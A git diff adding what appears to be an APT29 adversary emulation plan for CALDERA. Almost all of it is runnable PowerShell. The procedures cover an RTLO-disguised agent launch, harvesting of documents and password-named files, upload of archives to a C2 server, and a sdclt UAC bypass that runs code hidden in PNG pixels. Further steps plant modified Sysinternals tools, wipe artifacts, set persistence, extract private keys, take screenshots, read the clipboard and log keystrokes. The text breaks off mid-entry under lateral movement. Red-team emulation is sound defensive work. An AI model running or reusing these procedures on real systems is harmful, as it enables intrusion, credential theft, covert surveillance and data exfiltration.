diff --git a/apt29/Emulation_Plan/yaml/APT29-Day1.A.yaml b/apt29/Emulation_Plan/yaml/APT29-Day1.A.yaml new file mode 100644 index 00000000..bb32aca1 --- /dev/null +++ b/apt29/Emulation_Plan/yaml/APT29-Day1.A.yaml @@ -0,0 +1,1140 @@ +# APT29-Day1.A.yaml - CALDERA and Atomic style TTPs + +- emulation_plan_details: + id: 8d3c142e-9d26-42e3-ad78-b3841373a789 + adversary_name: APT29 Day 1.A + adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. This adversary models scenario Day 1.A of the APT29. + attack_version: 8.1 + format_version: 1.0 + +# Step 1 - Initial Breach + +- id: 571845f6-b75c-4b9d-a666-a78f7827261f + name: RTLO Start Sandcat + description: Perform RTLO technique with SANDCAT + tactic: execution + technique: + attack_id: T1036.002 + name: "Masquerading: Right-to-Left Override" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163405/CosmicDuke.pdf" + procedure_group: procedure_execution + procedure_step: "1.A" + platforms: + windows: + psh,pwsh: + command: | + Sleep 3; + $bin = Get-ChildItem *cod*scr*; + $arguments = '-server "#{server}" -group "rtlo_group"'; + start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; + + if ($?) { + write-host "Successfully completed RTLO execution. A new agent should appear"; + exit 0; + + } else { + write-host "Failure of RTLO execution."; + exit 1; + } + payloads: + - cod.3aka3.scr + + input_arguments: + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Sleep 3; + $bin = Get-ChildItem *cod*scr*; + $arguments = '-server "#{server}" -group "rtlo_group"'; + start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; + + if ($?) { + write-host "Successfully completed RTLO execution. A new agent should appear"; + exit 0; + + } else { + write-host "Failure of RTLO execution."; + exit 1; + } + +- id: a5daa530-c640-49bc-aa54-6808789a684a + name: PowerShell + description: Spawn powershell.exe from cmd.exe + tactic: execution + technique: + attack_id: T1059.001 + name: "Command and Scripting Interpreter: PowerShell" + cti_source: "https://securelist.com/the-cozyduke-apt/69731/" + procedure_group: procedure_execution + procedure_step: "1.B" + platforms: + windows: + cmd: + command: | + powershell.exe; + if ($?) { + write-host "[*] PowerShell successfully spawned"; + exit 0; + } + + executors: + - name: command_prompt + command: | + powershell.exe; + if ($?) { + write-host "[*] PowerShell successfully spawned"; + exit 0; + } + +# Step 2 - Rapid Collection and Exfiltration + +- id: 5692da31-3586-4e4f-8f07-5750070c730b + name: Automated Collection + description: Execute PowerShell from cmd.exe to collect and compress files of specific extensions. + tactic: collection + technique: + attack_id: T1119 + name: "Automated Collection" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_collection + procedure_step: "2.A" + platforms: + windows: + psh,pwsh: + command: | + $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force + + executors: + - name: powershell + command: | + $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force + +- id: 68e209dd-f354-4adc-8bc6-e85a3e55a7f4 + name: Data from staged fileand Exfiltration over C2 Channel + description: Copy a target file from a remote file share through the existing C2 channel + tactic: exfiltration + technique: + attack_id: T1041 + name: "Exfiltration Over Command and Control Channel" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_exfiltration + procedure_step: "2.B" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; + payloads: + - upload.ps1 + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; + +# Step 3 - Deploy Stealth Toolkit + +- id: 68b588bc-002a-42dc-bac7-9189f944065b + name: Staging monkey PNG + description: Staging PNG for Lateral Movement + tactic: defensive-evasion + technique: + attack_id: T1036.005 + name: "Masquerading: Match Legitimate Name or Location" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_def_evasion + procedure_step: "3.A" + platforms: + windows: + psh,pwsh: + command: | + $username="#{profile_user}"; + if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { + copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; + if ($? -eq $True) { + write-host "[+] Successfully copied monkey.png!"; + get-childitem -path "C:\Users\$username\Downloads\\"; + exit 0; + } else { + write-host "[+] Failed to copy monkey.png."; + exit 1; + } + + } else { + write-host "[*] monkey.png already exists within C:\users\$username\Downloads..." + } + payloads: + - monkey.png + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + $username="#{profile_user}"; + if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { + copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; + if ($? -eq $True) { + write-host "[+] Successfully copied monkey.png!"; + get-childitem -path "C:\Users\$username\Downloads\\"; + exit 0; + } else { + write-host "[+] Failed to copy monkey.png."; + exit 1; + } + +- id: 89e9dffa-8836-4672-8cf3-bebd006d2a2b + name: UAC Bypass via Backup Utility + description: Modify registry values of sdclt to bypass UAC + tactic: privilege-escalation + technique: + attack_id: T1548.002 + name: "Abuse Elevation Control Mechanism: Bypass User Account Control" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_privesc + procedure_step: "3.B" + platforms: + windows: + psh,pwsh: + command: | + if (!(test-path -path $env:windir\system32\sdclt.exe)) { + write-host "[!] sdclt.exe was not found on this host."; + exit 1; + } + New-Item -Path HKCU:\Software\Classes -Name Folder -Force; + New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; + New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; + New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; + + $username="#{profile_user}"; + $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; + + Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; + Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; + + cmd.exe /c sdclt.exe; + cmd.exe /c powershell.exe; + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + if (!(test-path -path $env:windir\system32\sdclt.exe)) { + write-host "[!] sdclt.exe was not found on this host."; + exit 1; + } + New-Item -Path HKCU:\Software\Classes -Name Folder -Force; + New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; + New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; + New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; + + $username="#{profile_user}"; + $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; + + Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; + Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; + + cmd.exe /c sdclt.exe; + cmd.exe /c powershell.exe; + +- id: 5ff80022-8d85-410b-b868-6c7565b267e5 + name: Registry Cleanup for UAC Bypass Technique + description: Delete registry entries post-UAC bypass. + tactic: defensive-evasion + technique: + attack_id: T1112 + name: "Modify Registry" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_def_evasion + procedure_step: "3.C" + platforms: + windows: + psh,pwsh: + command: | + Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; + if (!(test-path -path HKCU:\Software\Classes\Folder)) { + write-host "[+] Reg keys removed!"; + } + + executors: + - name: powershell + command: | + Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; + if (!(test-path -path HKCU:\Software\Classes\Folder)) { + write-host "[+] Reg keys removed!"; + } + +# Step 4 - Defense Evasion and Discovery + +- id: 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d + name: Planting Modified Sysinternals Utilities + description: Uploading payloads masquerading as via modified SysInternalsSuite + tactic: stage-capabilities + technique: + attack_id: T1036.005 + name: "Masquerading: Match Legitimate Name or Location" + cti_source: "N/A" + procedure_group: procedure_staging + procedure_step: "4.A" + platforms: + windows: + psh,pwsh: + command: | + iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; + Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; + + if (! $?) { + write-host "Error moving files to #{profile_user}\Downloads"; + exit 1; + } + + Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; + Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; + + if (! $?) { + write-host "Error expanding files to #{profile_user}\Downloads"; + exit 1; + } + + $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; + if ($dir_exists -eq $true) { + write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; + Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + } else { + mkdir "C:\Program Files\SysInternalsSuite"; + Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + } + + if (test-path -path "SysInternalsSuite.zip") { + Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { + remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { + remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { + Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if ($?) { + gci; + write-host "[*] Successfully planted files" + } else { + write-host "[!] Error downloading and planting modified system tools." + } + + payloads: + - Modified-SysInternalsSuite.zip + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; + Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; + + if (! $?) { + write-host "Error moving files to #{profile_user}\Downloads"; + exit 1; + } + + Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; + Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; + + if (! $?) { + write-host "Error expanding files to #{profile_user}\Downloads"; + exit 1; + } + + $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; + if ($dir_exists -eq $true) { + write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; + Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + } else { + mkdir "C:\Program Files\SysInternalsSuite"; + Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + } + + if (test-path -path "SysInternalsSuite.zip") { + Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { + remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { + remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { + Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if ($?) { + gci; + write-host "[*] Successfully planted files" + } else { + write-host "[!] Error downloading and planting modified system tools." + } + +- id: 646be6c9-f27a-4f5f-be5d-b8a0317e215f + name: Process Discovery + description: List running process on the machine via PowerShell. + tactic: discovery + technique: + attack_id: T1057 + name: "Process Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "4.B.1" + platforms: + windows: + psh,pwsh: + command: | + $ps = get-process; + write-output $ps; + + executors: + - name: powershell + command: | + $ps = get-process; + write-output $ps; + +- id: 9b5b5aec-32ff-4d74-8555-727b50ab15f6 + name: Artifact Cleanup - Delete Files + description: Cleanup files related to Operation + tactic: defensive-evasion + technique: + attack_id: T1070.004 + name: "Indicator Removal on Host: File Deletion" + cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + procedure_group: procedure_def_evasion + procedure_step: "4.B.2" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysInternalsSuite"; + gci $env:userprofile\Desktop; + .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; + .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; + .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysInternalsSuite"; + gci $env:userprofile\Desktop; + .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; + .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; + .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; + +- id: 6f1f4768-7099-45d2-a858-b49dc792234e + name: Loading Stage-2 & Performing Discovery + description: Load Stage-2 from Modified Sysinternals Toolset + tactic: discovery + technique: + attack_id: T1082 + name: "System Information Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "4.C.1" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if (!(test-path ".\readme.ps1")) { + Move-Item .\readme.txt readme.ps1 -Force; + } + . .\readme.ps1; + Invoke-Discovery; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if (!(test-path ".\readme.ps1")) { + Move-Item .\readme.txt readme.ps1 -Force; + } + . .\readme.ps1; + Invoke-Discovery; + +# Step 5 - Persistence + +- id: 9c75155e-21ab-4471-af16-45f3795a313c + name: Persistent Service 1 + description: Leverage modified Sysinternals + tactic: persistence + technique: + attack_id: T1547.009 + name: "Boot or Logon Autostart Execution: Shortcut Modification" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_persistence + procedure_step: "5.A" + platforms: + windows: + psh,pwsh: + command: | + Set-Location -path "C:\Program Files\SysinternalsSuite"; + if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { + write-host "[*] Service already exists...Not running persistence step-1"; + exit 1; + } + + if (Test-Path -path "readme.ps1") { + . .\readme.ps1; + Invoke-Persistence -PersistStep 1; + write-host "[+] Persistence 1 invoked."; + exit 0; + + } else { + write-host "[!] readme.ps1 not found."; + exit 1; + } + + executors: + - name: powershell + command: | + Set-Location -path "C:\Program Files\SysinternalsSuite"; + if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { + write-host "[*] Service already exists...Not running persistence step-1"; + exit 1; + } + + if (Test-Path -path "readme.ps1") { + . .\readme.ps1; + Invoke-Persistence -PersistStep 1; + write-host "[+] Persistence 1 invoked."; + exit 0; + + } else { + write-host "[!] readme.ps1 not found."; + exit 1; + } + +- id: 45f18b58-c14f-4b61-a3da-41b67af21429 + name: Persistent Service 2 + description: Leverage modified Sysinternals + tactic: persistence + technique: + attack_id: T1547.009 + name: "Boot or Logon Autostart Execution: Shortcut Modification" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_persistence + procedure_step: "5.B" + platforms: + windows: + psh,pwsh: + command: | + Set-Location -path "C:\Program Files\SysinternalsSuite"; + if (Test-Path -path "readme.ps1") { + . .\readme.ps1; + Invoke-Persistence -PersistStep 2; + write-host "[+] Persistence 2 invoked."; + + } else { + write-host "[!] readme.ps1 not found."; + return 1; + } + + executors: + - name: powershell + command: | + Set-Location -path "C:\Program Files\SysinternalsSuite"; + if (Test-Path -path "readme.ps1") { + . .\readme.ps1; + Invoke-Persistence -PersistStep 2; + write-host "[+] Persistence 2 invoked."; + + } else { + write-host "[!] readme.ps1 not found."; + return 1; + } + +# Step 6 - Credential Access + +- id: e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d + name: Credentials In Files- Chrome + description: Obtain credentials from Chrome Dumper + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_cred_access + procedure_step: "6.A" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + ./accesschk.exe -accepteula .; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + ./accesschk.exe -accepteula .; + +- id: c4f4b13c-87b6-498c-b814-93570173068c + name: Credentials In Files (T1081) - Private Keys Extraction + description: Obtain credentials via Custom PowerShell + tactic: credential-access + technique: + attack_id: T1552.004 + name: "Unsecured Credentials: Private Keys" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_cred_access + procedure_step: "6.B" + platforms: + windows: + psh,pwsh: + command: | + Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; + + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\readme.ps1; + Get-PrivateKeys; + if ($? -eq $True) { + write-host "[+] Successfully executed private key collection script."; + exit 0; + } else { + write-host "[!] Error, could not execution Get-PrivateKeys."; + exit 1; + } + payloads: + - dmevals.local.pfx + + executors: + - name: powershell + command: | + Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; + + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\readme.ps1; + Get-PrivateKeys; + if ($? -eq $True) { + write-host "[+] Successfully executed private key collection script."; + exit 0; + } else { + write-host "[!] Error, could not execution Get-PrivateKeys."; + exit 1; + } + +# TODO +# 6.C "Dump password hashes: [meterpreter*] > run post/windows/gather/credentials/credential_collector" missing! + +# Step 7 - Collection and Exfiltration + +- id: a4b14c10-49aa-4ae4-b165-d5a37364fe62 + name: Staging files for PowerShell module imports + description: Renaming psversion.txt to psversion.txt to be imported + tactic: defensive-evasion + technique: + attack_id: T1036.005 + name: "Masquerading: Match Legitimate Name or Location" + cti_source: "https://securelist.com/the-cozyduke-apt/69731/" + procedure_group: procedure_def_evasion + procedure_step: "7.A.1" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if (test-path -path ".\psversion.txt" ) { + move-item .\psversion.txt psversion.ps1 -Force; + } + write-host "[+] File psversion.ps1 staged to be imported." + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if (test-path -path ".\psversion.txt" ) { + move-item .\psversion.txt psversion.ps1 -Force; + } + write-host "[+] File psversion.ps1 staged to be imported." + +- id: a81ea4ad-bc9f-49a7-82d4-4466df641487 + name: Screen Capturing + description: Load custom PowerShell module and take screenshots. + tactic: collection + technique: + attack_id: T1113 + name: "Screen Capture" + cti_source: "https://securelist.com/the-cozyduke-apt/69731/" + procedure_group: procedure_collection + procedure_step: "7.A.2" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { + write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { + write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; + +- id: ee4c2eab-be57-434c-a32c-14b77360301a + name: Automated Collection (T1119) - Clipboard (T1115) + description: Get contents of clipboard + tactic: collection + technique: + attack_id: T1115 + name: "Clipboard Data" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_collection + procedure_step: "7.A.3" + platforms: + windows: + psh,pwsh: + command: | + $clip_data=get-clipboard; + if ($clip_data.Length -gt 0) { + write-host "[+] Clipboard data obtained!\n"; + write-host $clip_data; + } else { + write-host "[!] No clipboard data available!\n"; + } + + executors: + - name: powershell + command: | + $clip_data=get-clipboard; + if ($clip_data.Length -gt 0) { + write-host "[+] Clipboard data obtained!\n"; + write-host $clip_data; + } else { + write-host "[!] No clipboard data available!\n"; + } + +- id: db28f68d-e8b8-46e6-b680-642570d4b257 + name: Automated Collection (T1119) - Input Capture (T1417) + description: Load custom PowerShell module, and grab keystrokes for 15 seconds. + tactic: collection + technique: + attack_id: T1056.001 + name: "Input Capture: Keylogging" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_collection + procedure_step: "7.A.4" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Get-Keystrokes; + Start-Sleep -Seconds 15; + View-Job -JobName "Keystrokes"; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Get-Keystrokes; + Start-Sleep -Seconds 15; + View-Job -JobName "Keystrokes"; + +- id: a612311d-a802-48da-bb7f-88a4b9dd7a24 + name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) + description: Compress all data within Download directory and exfiltrate the results. + tactic: exfiltration + technique: + attack_id: T1041 + name: "Exfiltration Over C2 Channel" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_exfiltration + procedure_step: "7.B" + platforms: + windows: + psh,pwsh: + command: | + Write-Host "[*] Compressing all the things in download dir"; + Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; + + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; + if ($?) { + write-host "[+] Data exfil of download directory completed!"; + } else { + write-host "[!] Data exfil failed!"; + } + + payloads: + - upload.ps1 + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Write-Host "[*] Compressing all the things in download dir"; + Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; + + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; + if ($?) { + write-host "[+] Data exfil of download directory completed!"; + } else { + write-host "[!] Data exfil failed!"; + } + +# Step 8 - Lateral Movement + +# Where is "Copy payload to webdav share:" + +- id: 